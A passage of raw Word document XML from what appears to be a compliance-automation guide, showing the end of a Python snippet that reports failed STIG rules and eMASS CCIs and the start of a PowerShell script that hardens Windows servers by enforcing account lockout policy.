          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                    ccis.append(ident.text)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            print(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">f"STIG Rule Triggered: </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{rule_id}</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            print(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Associated eMASS CCIs: </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>', '</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.join(ccis) </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ccis </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'None'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            print(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Example usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># extract_failed_ccis("scap_compliance_results.xml")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0476EE" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRDefault="00D66D8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0A6A3F" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23495DFD" w14:textId="136BDD03" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Automating Windows Server Baseline Enforcement (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A769AF" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To maintain a continuous operational readiness baseline and satisfy the "Cyber Maintenance" portion of CORA, commands must replace manual system configuration with automated policy-as-code. Below is a hardened PowerShell snippet designed to remediate common high-risk boundary configuration flaws (Access Control and System Integrity families).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BD47D" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="005D3438" w:rsidRDefault="00B4067B" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131DCC7A" w14:textId="2C01AD81" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="005D3438">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;#</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.SYNOPSIS</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Automated STIG Remediation for Windows Boundary Systems.</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Aligns with CORA Cyber Maintenance and NIST SP 800-53 Rev 5.</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.DESCRIPTION</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Enforces secure protocols, disables insecure access, and manages account </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    lockout thresholds to mitigate adversary initial access tactics.</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>#&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Ensure script is executing with administrative privileges</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write-Error</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Administrative privileges required. Rerun this script as an Administrator."</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exit</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write-Output</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[*] Commencing Automated STIG Baseline Enforcement..."</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># NIST Control: AC-17 / AC-2 | Enforce Strict Account Lockout (Mitigate Brute</w:t>
      </w:r>
      <w:r w:rsidR="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Force</w:t>
      </w:r>
      <w:r w:rsidR="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempts</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write-Output</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[+] Configuring Account Lockout Policies..."</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>net accounts /lockoutthreshold:</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /lockoutduration:</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
